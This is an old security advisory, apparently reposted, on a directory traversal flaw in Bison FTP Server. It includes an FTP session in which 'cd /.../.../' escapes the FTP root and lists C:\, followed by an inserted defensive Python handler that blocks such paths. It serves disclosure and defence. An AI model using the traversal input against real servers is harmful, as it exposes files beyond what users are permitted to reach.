Computer Security
[EN] securityvulns.ru

From: HEXYN
Date: 14.05.2001
Subject: Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

Topic: Bison FTP Server Directory Traversal
Announced: 2001-02-17
Affects: Bison FTP Server version 4 Release 1

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS
BE CORRECT.

I. Problem Description
**********************
Bison FTP Server is an FTP server for Windows 9x/NT. A bug allows any
logged-in user to change to any directory on the server, outside the FTP root.

II. Impact
**********
Sending the command "CWD ..." (or "cd ..." in the default UNIX FTP
client) makes the server go one directory up, even past the FTP root,
as the example below shows.

Example:
--------

<snip>
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /.../.../
250 CWD command successful.
ftp> ls
200 PORT command successful.
150  Opening ASCII mode data connection for /.
<directory listing of c:\>
ftp> quit
221 Bye.
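How a server-side CWD handler can refuse this class of request, as an added example that is not Bison FTP's own code (the advisory does not show its internals): the virtual root "/" mapping onto an assumed disk root such as /srv/ftp, and the 550 reply text, are assumptions made here.

```python
import os
import posixpath
import re

# Any path segment made only of dots, other than "..", is refused outright:
# on Windows 9x a name such as "..." walks more than one directory up, which
# is how "CWD /.../.../" in the advisory ends up listing C:\.
_DOT_RUN = re.compile(r"^\.{3,}$")


def virtual_cwd(cwd, arg):
    """Resolve a CWD argument against the client's current virtual directory.

    Virtual paths are POSIX style and rooted at "/", which maps onto the
    FTP root on disk.  Returns the new virtual directory, or None when the
    request must be refused.
    """
    if "\\" in arg or "\x00" in arg:          # Windows separators, NULs: never valid
        return None
    if any(_DOT_RUN.match(seg) for seg in arg.split("/")):
        return None
    target = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    new = posixpath.normpath(target)          # collapses "." and "x/.."; "/.." stays "/"
    return new if new.startswith("/") else None


def disk_path(root, virtual):
    """Map a resolved virtual directory onto the disk root and re-check containment.

    This is an independent second check: a path that does not stay under
    root is refused even if virtual_cwd were ever bypassed.
    """
    root = os.path.normpath(root)
    parts = [seg for seg in virtual.split("/") if seg]
    candidate = os.path.normpath(os.path.join(root, *parts))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def handle_cwd(root, cwd, arg):
    """Return (new_cwd, reply) for one CWD command; cwd is unchanged on refusal."""
    new = virtual_cwd(cwd, arg)
    if new is None or disk_path(root, new) is None:
        return cwd, "550 CWD failed: path outside FTP root"
    return new, "250 CWD command successful."
```

A refused request is also a useful detection signal: logging the raw argument alongside the 550 reply makes dot-run and backslash probes easy to spot in the server log.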

III. Solution
*************
At this time, no patch is available.

IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be

© SecurityVulns, 3APA3A, Vladimir Dubrovin